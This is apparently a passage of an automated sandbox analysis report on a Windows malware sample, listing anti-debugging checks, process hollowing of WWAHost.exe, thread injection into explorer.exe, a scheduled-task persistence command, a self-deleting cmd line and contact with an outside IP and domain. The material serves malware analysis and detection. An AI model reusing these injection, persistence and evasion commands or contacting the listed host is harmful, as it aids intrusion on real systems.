          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\456yqMyHvT.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.237.52.145 80
          Source: C:\Windows\explorer.exeDomain query: www.zaborski.pro
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\456yqMyHvT.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 1190000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\456yqMyHvT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\456yqMyHvT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\456yqMyHvT.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\456yqMyHvT.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\456yqMyHvT.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\456yqMyHvT.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\456yqMyHvT.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess created: C:\Users\user\Desktop\456yqMyHvT.exe C:\Users\user\Desktop\456yqMyHvT.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: explorer.exe, 00000008.00000000.704466857.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000008.00000000.705262176.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000F.00000002.926554633.0000000005360000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.705262176.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000F.00000002.926554633.0000000005360000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.705262176.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000F.00000002.926554633.0000000005360000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.705262176.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000F.00000002.926554633.0000000005360000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.756187684.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Users\user\Desktop\456yqMyHvT.exe VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
